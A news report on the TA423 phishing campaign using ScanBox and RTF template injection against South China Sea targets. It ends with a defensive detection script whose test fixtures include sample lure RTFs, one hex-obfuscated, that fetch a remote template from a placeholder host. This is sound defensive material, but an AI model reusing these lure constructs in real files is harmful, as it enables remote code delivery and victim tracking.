Chinese Phishing Campaign Targets Victims in South China Sea
Campaign Uses ScanBox Framework and RTF Template Injection
Chinese intelligence threat actors are conducting cyberespionage campaigns targeting the Australian government and corporations involved with energy extraction in the South China Sea, researchers say.
The campaign's latest guise is posing as an Australian online media outlet in a bid to lure victims to a site that loads ScanBox, a JavaScript-based web reconnaissance and exploitation framework that is likely used by multiple China-based threat actors, concludes a joint report from Proofpoint and PricewaterhouseCoopers.
The two companies assess with moderate confidence that the campaign, which Proofpoint began observing in March 2021, is the work of the threat actor known as TA423 or Red Ladon. Its activities overlap with those of the threat actor dubbed APT40 or Leviathan.
A 2021 indictment of Chinese hackers by the U.S. Department of Justice attributed the group's activity to the Hainan State Security Department, a provincial arm of China's Ministry of State Security in the southern island province of Hainan. Proofpoint and PwC researchers assess that the South China Sea is among TA423's longest-running areas of responsibility (see: US Indicts 4 Chinese Nationals for Lengthy Hacking Campaign).
The phishing campaign is one sign of South China Sea regional tensions, where Beijing aggressively presses disputed territorial claims. "There is a clear and upward trend of PRC provocations against South China Sea claimants and other states lawfully operating in the region," a U.S. Department of State official told a Washington think tank audience, Reuters reported earlier this summer.
TA423 supports "the Chinese government in matters related to the South China Sea, including during the recent tensions in Taiwan," says Sherrod DeGrippo, Proofpoint vice president of threat research and detection, referring to Chinese objections to a Taipei visit by U.S. House Speaker Nancy Pelosi earlier this month.
"This group specifically wants to know who is active in the region and while we can't say for certain, their focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia," DeGrippo says.
Among the phishing campaign's targets are organizations connected with exploitation of the Kasawari offshore gas field in Malaysia's exclusive economic zone and an offshore wind farm in the Taiwan Strait.
In the latest campaign, detected in April and extending through June, threat actors targeted local and federal Australian governmental agencies, news media companies and global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.
These phishing campaigns originated from Gmail and Outlook email addresses. Frequently, the threat actor posed as an employee of the fictional media publication "Australian Morning News." The associated web domain contained content copied from legitimate news publications, including the BBC and Sky News.
ScanBox's modular, plugin-based design is a bid to prevent crashes or errors in the victim's browser that might tip off the owners of compromised websites, researchers say.
Researchers say that the initial ScanBox script harvests data about the victim's browser and system that helps set up the following stages of information gathering and potential follow-on exploitation or compromise.
RTF Template Injection
In an earlier campaign observed in March, the phishing emails carried Rich Text Format attachments that used template injection, with template URLs customized for each target.
RTF template injection is a technique in which an RTF file containing decoy content is altered so that, when the file is opened, the word processor retrieves a template hosted at an external URL. Because Microsoft Office opens RTF files natively and honors the template reference, the remotely fetched template can carry further malicious content, giving attackers an opportunity to compromise the target system without the user doing anything beyond opening the document.
Although the campaign served the same payload to every victim, the template URLs were distinct: each embedded a victim ID that correlated to the intended recipient and allowed the attackers to track active infections.
"Notably, the recurring use of custom URLs that are unique to each victim, likely for infection tracking purposes, is a commonality to the ScanBox phishing URLs observed later in April 2022," researchers say.
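The following triage script is an added example, not code from the report or from either vendor. It shows what a practitioner would check for in a suspect attachment: an RTF (identified by magic bytes, since the attachment extension cannot be trusted) that carries a `\*\template` destination pointing at a remote location, and the per-victim token embedded in that URL. The sample RTF blobs, the host `example.invalid`, the path layout and the token `9f3a1b` are constructed placeholders, not indicators from the campaign; the token-extraction rule is a heuristic assumption, since the report does not publish the URL format.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit, parse_qs

# Constructed samples (not artifacts from the report). Host, path and ID are placeholders.
MALICIOUS_RTF = (
    b"{\\rtf1\\ansi\\deff0"
    b"{\\*\\template http://example.invalid/t/9f3a1b/page.dotm}"
    b"{\\fonttbl{\\f0 Arial;}}"
    b"\\f0\\fs24 Australian Morning News decoy text.\\par}"
)

# Same technique with the scheme hidden behind RTF hex escapes (\'68 = 'h', and so on),
# a common way to dodge naive string matching on "http".
OBFUSCATED_RTF = (
    b"{\\rtf1\\ansi\\deff0"
    b"{\\*\\template \\'68\\'74\\'74\\'70://example.invalid/t/9f3a1b/page.dotm}"
    b"\\f0 text\\par}"
)

BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\f0\\fs24 Plain document.\\par}"

# {\*\template ...} destination group; the body runs up to the closing brace.
TEMPLATE_DEST = re.compile(rb"\{\\\*\\template\b([^}]*)\}", re.IGNORECASE | re.DOTALL)
HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# Remote locations Word will fetch: HTTP(S), FTP, or a UNC path. A local .dotx path is benign.
REMOTE_SCHEME = re.compile(rb"^(?:https?://|ftp://|\\\\)", re.IGNORECASE)


def decode_hex_escapes(raw: bytes) -> bytes:
    """Resolve \\'hh escapes so an obfuscated URL reads as plain text."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def strip_control_words(raw: bytes) -> bytes:
    """Drop leftover RTF control words (e.g. \\f0) that may be interleaved with the URL."""
    return re.sub(rb"\\[a-z]+-?\d*\s?", b"", raw)


def find_remote_templates(data: bytes) -> List[str]:
    """Return every remote template URL referenced by an RTF blob (empty if not RTF or none)."""
    # Check the magic, not the filename: RTF lures are routinely shipped with a .doc extension.
    if not data.lstrip().startswith(b"{\\rtf"):
        return []
    found = []
    for m in TEMPLATE_DEST.finditer(data):
        target = strip_control_words(decode_hex_escapes(m.group(1))).strip()
        if REMOTE_SCHEME.match(target):
            found.append(target.decode("latin-1"))
    return found


def tracking_id(url: str) -> Optional[str]:
    """Heuristic (assumption, not the report's format): a query value if present, else the
    last path segment that does not look like a filename, which is where a per-victim
    token is typically placed."""
    parts = urlsplit(url)
    for values in parse_qs(parts.query).values():
        if values:
            return values[0]
    segments = [s for s in parts.path.split("/") if s]
    if segments and "." in segments[-1]:
        segments = segments[:-1]
    return segments[-1] if segments else None


def triage(name: str, data: bytes) -> dict:
    """One-line verdict for a mail-gateway or sandbox pre-filter."""
    urls = find_remote_templates(data)
    return {
        "file": name,
        "remote_templates": urls,
        "tracking_ids": [tracking_id(u) for u in urls],
        "verdict": "suspicious" if urls else "clean",
    }


if __name__ == "__main__":
    for fname, blob in [("lure.doc", MALICIOUS_RTF), ("lure2.rtf", OBFUSCATED_RTF),
                        ("memo.rtf", BENIGN_RTF)]:
        print(triage(fname, blob))
```

Two caveats worth keeping in mind when turning this into a detection: the `\template` control word is legitimate when it points at a local template, so the scheme check is what separates the injection from normal documents; and because the per-victim URL tells the operator who opened the lure, detonating the attachment in a sandbox that has outbound access confirms the target to the attacker, so block or sinkhole the template fetch before analysis.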
One of the targets of the RTF campaign was a European manufacturer of heavy equipment used in building the Yunlin Offshore Wind Farm in the Taiwan Strait.